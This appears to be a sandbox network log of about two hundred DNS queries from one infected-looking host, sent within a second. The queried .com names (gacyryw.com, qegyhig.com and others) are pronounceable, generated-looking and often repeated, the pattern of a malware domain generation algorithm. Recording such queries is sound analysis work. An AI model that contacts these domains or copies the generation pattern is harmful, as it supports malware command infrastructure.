                                                                                                                                                                                                              Aug 23, 2024 18:47:41.745532036 CEST192.168.2.41.1.1.10x3687Standard query (0)gacyryw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.745743036 CEST192.168.2.41.1.1.10xffc5Standard query (0)qegyhig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.745743036 CEST192.168.2.41.1.1.10xd3c8Standard query (0)pufygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.746175051 CEST192.168.2.41.1.1.10xa503Standard query (0)vowycac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.746175051 CEST192.168.2.41.1.1.10x80d7Standard query (0)lyxywer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.746678114 CEST192.168.2.41.1.1.10x7d0fStandard query (0)qexyryl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.746757030 CEST192.168.2.41.1.1.10xd595Standard query (0)qeqyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.746877909 CEST192.168.2.41.1.1.10x338eStandard query (0)puzywel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.747117996 CEST192.168.2.41.1.1.10xf93cStandard query (0)gaqycos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.747737885 CEST192.168.2.41.1.1.10x7a7aStandard query (0)lymyxid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.747891903 CEST192.168.2.41.1.1.10x1b2fStandard query (0)volyqat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.748579979 CEST192.168.2.41.1.1.10x8205Standard query (0)vofygum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.748658895 CEST192.168.2.41.1.1.10x2636Standard query (0)lyvytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.749119997 CEST192.168.2.41.1.1.10x51c2Standard query (0)gadyfuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.749411106 CEST192.168.2.41.1.1.10x997cStandard query (0)pumyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.750103951 CEST192.168.2.41.1.1.10xc3b9Standard query (0)qedyfyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.750451088 CEST192.168.2.41.1.1.10xd87fStandard query (0)galyqaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.750451088 CEST192.168.2.41.1.1.10x605dStandard query (0)lysyfyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.750873089 CEST192.168.2.41.1.1.10x1952Standard query (0)vonyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.751652002 CEST192.168.2.41.1.1.10x6385Standard query (0)lygymoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.753565073 CEST192.168.2.41.1.1.10x68d9Standard query (0)vowydef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.753772974 CEST192.168.2.41.1.1.10x1a1dStandard query (0)qexylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.754038095 CEST192.168.2.41.1.1.10xf19dStandard query (0)qekyqop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.881356955 CEST192.168.2.41.1.1.10xab39Standard query (0)gahyqah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.881624937 CEST192.168.2.41.1.1.10xe957Standard query (0)puvyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.882385969 CEST192.168.2.41.1.1.10x9f14Standard query (0)lyryfyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.882914066 CEST192.168.2.41.1.1.10x5cddStandard query (0)purydyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.882914066 CEST192.168.2.41.1.1.10x7126Standard query (0)qegyqaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.883538008 CEST192.168.2.41.1.1.10x8d54Standard query (0)gacyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.883538008 CEST192.168.2.41.1.1.10xb4e1Standard query (0)lygymoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.884310007 CEST192.168.2.41.1.1.10x1181Standard query (0)vowydef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.884310007 CEST192.168.2.41.1.1.10xa2d8Standard query (0)qexylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.884846926 CEST192.168.2.41.1.1.10x9ddStandard query (0)pufymoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.885016918 CEST192.168.2.41.1.1.10x6ad5Standard query (0)gaqydeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.885632038 CEST192.168.2.41.1.1.10x713cStandard query (0)lyxylux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.885761976 CEST192.168.2.41.1.1.10x2791Standard query (0)vofymik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.886106968 CEST192.168.2.41.1.1.10x64eStandard query (0)qeqysag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.886816025 CEST192.168.2.41.1.1.10x441aStandard query (0)gadyniw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.886816025 CEST192.168.2.41.1.1.10x58afStandard query (0)puzylyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.888113976 CEST192.168.2.41.1.1.10x1641Standard query (0)lymysan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.888871908 CEST192.168.2.41.1.1.10xc012Standard query (0)volykyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.892385960 CEST192.168.2.41.1.1.10x1fcbStandard query (0)qedynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.895136118 CEST192.168.2.41.1.1.10x49b3Standard query (0)pumypog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.895802975 CEST192.168.2.41.1.1.10xba96Standard query (0)galykes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.896006107 CEST192.168.2.41.1.1.10xa770Standard query (0)lysynur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.896006107 CEST192.168.2.41.1.1.10x356dStandard query (0)vonypom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.896193027 CEST192.168.2.41.1.1.10x1e49Standard query (0)qekykev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.896339893 CEST192.168.2.41.1.1.10x45d6Standard query (0)ganypih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.896339893 CEST192.168.2.41.1.1.10x9344Standard query (0)pupybul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.896508932 CEST192.168.2.41.1.1.10xe8d3Standard query (0)qebytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.896508932 CEST192.168.2.41.1.1.10x1e5eStandard query (0)lykyjad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.896703959 CEST192.168.2.41.1.1.10xcf28Standard query (0)gatyvyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.896703959 CEST192.168.2.41.1.1.10xa1e0Standard query (0)lyvytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.896852016 CEST192.168.2.41.1.1.10x1937Standard query (0)vojyjof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.897102118 CEST192.168.2.41.1.1.10x1560Standard query (0)qetyvep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.897102118 CEST192.168.2.41.1.1.10xa5c4Standard query (0)pujyjav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.897377014 CEST192.168.2.41.1.1.10xd4f9Standard query (0)puvytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.897377014 CEST192.168.2.41.1.1.10x1686Standard query (0)gahyhob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.897540092 CEST192.168.2.41.1.1.10x7c47Standard query (0)lyryvex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.897859097 CEST192.168.2.41.1.1.10x1b7aStandard query (0)vocyruk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.898081064 CEST192.168.2.41.1.1.10xa9a2Standard query (0)qegyhig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.899291992 CEST192.168.2.41.1.1.10x7d66Standard query (0)purycap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.902673006 CEST192.168.2.41.1.1.10x69e2Standard query (0)gacyryw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.903103113 CEST192.168.2.41.1.1.10xc000Standard query (0)lygygin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.903443098 CEST192.168.2.41.1.1.10x9bc5Standard query (0)vowycac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.903604984 CEST192.168.2.41.1.1.10xa7fStandard query (0)qexyryl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.904367924 CEST192.168.2.41.1.1.10xf977Standard query (0)pufygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.905278921 CEST192.168.2.41.1.1.10x26e2Standard query (0)lyxywer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.979331970 CEST192.168.2.41.1.1.10x1d17Standard query (0)vojyqem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.981563091 CEST192.168.2.41.1.1.10xca4aStandard query (0)qetyfuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.985554934 CEST192.168.2.41.1.1.10x3497Standard query (0)puvyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.987833977 CEST192.168.2.41.1.1.10xcec1Standard query (0)gahyqah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.989670038 CEST192.168.2.41.1.1.10xadc7Standard query (0)lyryfyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.990619898 CEST192.168.2.41.1.1.10xab60Standard query (0)vocyzit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.991178036 CEST192.168.2.41.1.1.10xed0dStandard query (0)qegyqaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.992166996 CEST192.168.2.41.1.1.10x9918Standard query (0)purydyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.992755890 CEST192.168.2.41.1.1.10x19a6Standard query (0)gacyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.993454933 CEST192.168.2.41.1.1.10xbf25Standard query (0)lygymoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.994333029 CEST192.168.2.41.1.1.10x62fStandard query (0)vowydef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.994452953 CEST192.168.2.41.1.1.10xc6afStandard query (0)pufymoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.995203972 CEST192.168.2.41.1.1.10x8200Standard query (0)qexylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.996216059 CEST192.168.2.41.1.1.10x57aeStandard query (0)gaqydeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.997490883 CEST192.168.2.41.1.1.10x9823Standard query (0)lyxylux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.997490883 CEST192.168.2.41.1.1.10xc3fStandard query (0)vofymik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.998322964 CEST192.168.2.41.1.1.10xaf76Standard query (0)qeqysag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:41.998997927 CEST192.168.2.41.1.1.10xa527Standard query (0)puzylyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.002150059 CEST192.168.2.41.1.1.10x7ce8Standard query (0)volykyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.002808094 CEST192.168.2.41.1.1.10x10feStandard query (0)qedynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.003793955 CEST192.168.2.41.1.1.10xa07bStandard query (0)pumypog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.004897118 CEST192.168.2.41.1.1.10x457bStandard query (0)galykes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.005412102 CEST192.168.2.41.1.1.10x51a1Standard query (0)lysynur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.006333113 CEST192.168.2.41.1.1.10x9785Standard query (0)qekykev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.007215023 CEST192.168.2.41.1.1.10x1089Standard query (0)pupybul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.007339954 CEST192.168.2.41.1.1.10x874eStandard query (0)ganypih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.008735895 CEST192.168.2.41.1.1.10xbcf0Standard query (0)lykyjad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.009792089 CEST192.168.2.41.1.1.10x4e64Standard query (0)vopybyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.010561943 CEST192.168.2.41.1.1.10x1b3Standard query (0)qebytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.011040926 CEST192.168.2.41.1.1.10x2c6aStandard query (0)pujyjav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.011498928 CEST192.168.2.41.1.1.10x7576Standard query (0)gatyvyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.012243032 CEST192.168.2.41.1.1.10x2d18Standard query (0)lyvytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.024883032 CEST192.168.2.41.1.1.10xc7bStandard query (0)vojyjof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.663491964 CEST192.168.2.41.1.1.10x7ce1Standard query (0)gahyraw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.664375067 CEST192.168.2.41.1.1.10x8b7aStandard query (0)lyrygyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.705775976 CEST192.168.2.41.1.1.10xb2fdStandard query (0)vocycuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.705976009 CEST192.168.2.41.1.1.10x7c79Standard query (0)qegyrol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.706271887 CEST192.168.2.41.1.1.10x2dd0Standard query (0)purygeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.706502914 CEST192.168.2.41.1.1.10xc7a4Standard query (0)gacycus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.707025051 CEST192.168.2.41.1.1.10x1c6fStandard query (0)lygywor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.707210064 CEST192.168.2.41.1.1.10xe811Standard query (0)vowygem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.707700014 CEST192.168.2.41.1.1.10x8902Standard query (0)qexyxuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.707916021 CEST192.168.2.41.1.1.10x13deStandard query (0)pufywil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.725516081 CEST192.168.2.41.1.1.10xace3Standard query (0)gaqyfah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.730881929 CEST192.168.2.41.1.1.10xe732Standard query (0)lyxyxyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.731311083 CEST192.168.2.41.1.1.10xe238Standard query (0)vofyqit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.731482029 CEST192.168.2.41.1.1.10xe81bStandard query (0)qeqyfaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.731700897 CEST192.168.2.41.1.1.10x5ca2Standard query (0)puzyxyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.731962919 CEST192.168.2.41.1.1.10x2ce1Standard query (0)gadyquz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.732188940 CEST192.168.2.41.1.1.10x8494Standard query (0)lymyfoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.732247114 CEST192.168.2.41.1.1.10x37bStandard query (0)volyzef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.732429981 CEST192.168.2.41.1.1.10xc55dStandard query (0)pumydoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.732547045 CEST192.168.2.41.1.1.10x7922Standard query (0)qedyqup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.732743979 CEST192.168.2.41.1.1.10x51ddStandard query (0)galyzeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.732875109 CEST192.168.2.41.1.1.10xca77Standard query (0)lysymux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.733037949 CEST192.168.2.41.1.1.10xcbfStandard query (0)vonydik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.733314991 CEST192.168.2.41.1.1.10xb4eeStandard query (0)qekylag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.733608007 CEST192.168.2.41.1.1.10x24f9Standard query (0)pupymyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.733783007 CEST192.168.2.41.1.1.10xeb62Standard query (0)ganydiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.733951092 CEST192.168.2.41.1.1.10x7378Standard query (0)vopymyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.734122992 CEST192.168.2.41.1.1.10xfd23Standard query (0)lykylan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.734457016 CEST192.168.2.41.1.1.10x3ae2Standard query (0)qebysul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.734683037 CEST192.168.2.41.1.1.10xd973Standard query (0)pujylog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.734829903 CEST192.168.2.41.1.1.10x1ac6Standard query (0)gatynes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.735090971 CEST192.168.2.41.1.1.10x1361Standard query (0)lyvysur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.735308886 CEST192.168.2.41.1.1.10xad29Standard query (0)vojykom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.735466003 CEST192.168.2.41.1.1.10x5c6Standard query (0)qetynev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.736140966 CEST192.168.2.41.1.1.10x8c08Standard query (0)puvypul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.736345053 CEST192.168.2.41.1.1.10x3ee4Standard query (0)vocypyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.736447096 CEST192.168.2.41.1.1.10xfddbStandard query (0)lyrynad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.736603022 CEST192.168.2.41.1.1.10xb536Standard query (0)gahykih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.736762047 CEST192.168.2.41.1.1.10x84eStandard query (0)purybav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.736906052 CEST192.168.2.41.1.1.10x2831Standard query (0)gacypyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.737046957 CEST192.168.2.41.1.1.10x50beStandard query (0)qegykiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.747864008 CEST192.168.2.41.1.1.10x91d7Standard query (0)vowybof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.748056889 CEST192.168.2.41.1.1.10xe60bStandard query (0)lygyjuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.748241901 CEST192.168.2.41.1.1.10xaa5bStandard query (0)pufyjuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.749372959 CEST192.168.2.41.1.1.10xb549Standard query (0)gaqyvob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.749536037 CEST192.168.2.41.1.1.10x84f8Standard query (0)qexytep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.749752998 CEST192.168.2.41.1.1.10xdc55Standard query (0)lyxytex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.749887943 CEST192.168.2.41.1.1.10xbd16Standard query (0)vofyjuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.750624895 CEST192.168.2.41.1.1.10x727bStandard query (0)qeqyvig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.750786066 CEST192.168.2.41.1.1.10x97cfStandard query (0)gadyhyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.750910044 CEST192.168.2.41.1.1.10x9739Standard query (0)puzytap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.751107931 CEST192.168.2.41.1.1.10xe363Standard query (0)volyrac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.751300097 CEST192.168.2.41.1.1.10x780bStandard query (0)qedyhyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.751847982 CEST192.168.2.41.1.1.10xf86fStandard query (0)lymyvin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.752116919 CEST192.168.2.41.1.1.10xd1a0Standard query (0)pumycug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.752408981 CEST192.168.2.41.1.1.10xcadfStandard query (0)galyros.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.753125906 CEST192.168.2.41.1.1.10xea54Standard query (0)lysyger.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.753300905 CEST192.168.2.41.1.1.10xcd10Standard query (0)qekyrov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.753458023 CEST192.168.2.41.1.1.10x2894Standard query (0)vonycum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.753710985 CEST192.168.2.41.1.1.10x2ff3Standard query (0)pupygel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.754631042 CEST192.168.2.41.1.1.10x54aStandard query (0)ganycuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.754887104 CEST192.168.2.41.1.1.10x55abStandard query (0)lykywid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.755065918 CEST192.168.2.41.1.1.10xad6eStandard query (0)qebyxyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.755208015 CEST192.168.2.41.1.1.10x77daStandard query (0)vopygat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.888098001 CEST192.168.2.41.1.1.10x441aStandard query (0)gadyniw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.942323923 CEST192.168.2.41.1.1.10xa362Standard query (0)pujywiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.943033934 CEST192.168.2.41.1.1.10x6f04Standard query (0)gatyfaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.943610907 CEST192.168.2.41.1.1.10x2cd4Standard query (0)lyvyxyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.950983047 CEST192.168.2.41.1.1.10x6b3cStandard query (0)qetyfop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.951832056 CEST192.168.2.41.1.1.10x4b08Standard query (0)vojyquf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.956535101 CEST192.168.2.41.1.1.10xb58fStandard query (0)puvyxeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.956732988 CEST192.168.2.41.1.1.10xea9dStandard query (0)gahyqub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.956890106 CEST192.168.2.41.1.1.10x4b51Standard query (0)lyryfox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.957046986 CEST192.168.2.41.1.1.10x7b4Standard query (0)vocyzek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.976017952 CEST192.168.2.41.1.1.10x4f5Standard query (0)vowydic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.980382919 CEST192.168.2.41.1.1.10x68dfStandard query (0)purydip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.980714083 CEST192.168.2.41.1.1.10x66f9Standard query (0)gacyzaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.980848074 CEST192.168.2.41.1.1.10x62c6Standard query (0)lygymyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.981100082 CEST192.168.2.41.1.1.10xcdc1Standard query (0)pufymyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:42.981374025 CEST192.168.2.41.1.1.10x6c7dStandard query (0)gaqydus.comA (IP address)IN (0x0001)false
